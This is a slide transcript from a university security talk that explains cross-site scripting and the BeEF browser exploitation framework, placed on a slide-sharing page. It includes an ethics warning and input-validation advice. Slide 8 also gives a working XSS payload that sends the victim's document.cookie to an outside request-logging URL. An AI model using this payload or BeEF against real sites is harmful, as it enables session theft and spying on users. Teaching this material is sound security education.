Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Got BeEf?

Cameron Lonsdale
August 01, 2017
Programming
0
230

Got BeEf?

Cameron Lonsdale

August 01, 2017
Tweet

More Decks by Cameron Lonsdale

See All by Cameron Lonsdale
K8'ers gonna H8
cameronlonsdale
1
840
A Practical Introduction to Cryptanalysis
cameronlonsdale
0
630
Intro to Crypto
cameronlonsdale
0
330

Other Decks in Programming

See All in Programming
Better Code Design in PHP
afilina
PRO
0
130
距離関数を極める! / SESSIONS 2024
gam0022
0
290
카카오페이는 어떻게 수천만 결제를 처리할까? 우아한 결제 분산락 노하우
kakao
PRO
0
110
Why Jakarta EE Matters to Spring - and Vice Versa
ivargrimstad
0
1.1k
ECS Service Connectのこれまでのアップデートと今後のRoadmapを見てみる
tkikuc
2
250
Pinia Colada が実現するスマートな非同期処理
naokihaba
4
230
タクシーアプリ『GO』のリアルタイムデータ分析基盤における機械学習サービスの活用
mot_techtalk
4
1.5k
A Journey of Contribution and Collaboration in Open Source
ivargrimstad
0
980
[Do iOS '24] Ship your app on a Friday...and enjoy your weekend!
polpielladev
0
110
Enabling DevOps and Team Topologies Through Architecture: Architecting for Fast Flow
cer
PRO
0
340
PHP でアセンブリ言語のように書く技術
memory1994
PRO
1
170
.NET のための通信フレームワーク MagicOnion 入門 / Introduction to MagicOnion
mayuki
1
1.7k

Featured

See All Featured
Unsuck your backbone
ammeep
668
57k
CSS Pre-Processors: Stylus, Less & Sass
bermonpainter
356
29k
The Web Performance Landscape in 2024 [PerfNow 2024]
tammyeverts
0
100
Building Applications with DynamoDB
mza
90
6.1k
Performance Is Good for Brains [We Love Speed 2024]
tammyeverts
6
430
実際に使うSQLの書き方 徹底解説 / pgcon21j-tutorial
soudai
169
50k
Cheating the UX When There Is Nothing More to Optimize - PixelPioneers
stephaniewalter
280
13k
VelocityConf: Rendering Performance Case Studies
addyosmani
325
24k
Happy Clients
brianwarren
98
6.7k
We Have a Design System, Now What?
morganepeng
50
7.2k
Building Better People: How to give real-time feedback that sticks.
wjessup
364
19k
Being A Developer After 40
akosma
87
590k

Transcript

  1. Original slides by @lin_s and @putfoo disrupted by @clonsdale Got

    BeEF?

  2. • What you are learning can be used for malicious

    purposes. • Myself, the university or anyone else are NOT responsible for your actions. • Do NOT, UNDER ANY CIRCUMSTANCES, illegally attempt to gain access to systems you do not own. • If you are not sure, DON’T DO IT. A NOTE ON ETHICS...

  3. CROSS-SITE SCRIPTING WOW • Just a pop-up? • Injecting Java

    Script • Abusing the trust a user has on the app • More than 50% applications across the globe vulnerable to this

  4. XSS – THINGS TO LOOK FOR • Client send a

    request with malicious input. • Server stores the script in the database. • When victim visits the page, script loads. • BOOM! XSS • Client sends a request with malicious input to the server. • Server sends back the user input without validation. • Browser executes the malicious code. • BOOM! XSS DOM Based XSS is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner. REFLECTED XSS STORED XSS DOM-BASED XSS

  5. EDGE CASES Using file uploads Using image file names Using

    .swf files CSP by pass ☺

  6. SOMETHING TO HELP YOU ALONG... ‘”)>///*--../omgmeow

  7. Lets try it - Together! letstalkcyber.club

  8. Example Attacks Steal user credentials <script>var i = new Image();i.src

    = "http://requestb.in/1bycym81/?c="+document.cookie;</script> Phishing Attacks

  9. [DEFENSIVE] MAKE NO ASSUMPTIONS Don’t trust user input. Before you

    use an input, validate it. Don’t trust other systems you talk to. Validate all data you rely on. Validate both format and value – attacks aren’t just semantic.

  10. BeEf - Browser Exploitation Framework • http://beefproject.com/ • Easy to

    use, point and click attacks on targets • Works by hooking a victim with an XSS payload • Can take photos of the person's screen and turn on their webcam ~all hail the demo gods~

  11. READING MATERIAL (REFERENCE) • OWASP XSS: • https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) • https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sh

    eet • XSS Shortening Cheat Sheet: • https://labs.neohapsis.com/2012/04/19/xss-shortening-cheats heet/ • https://excess-xss.com/ • http://beefproject.com/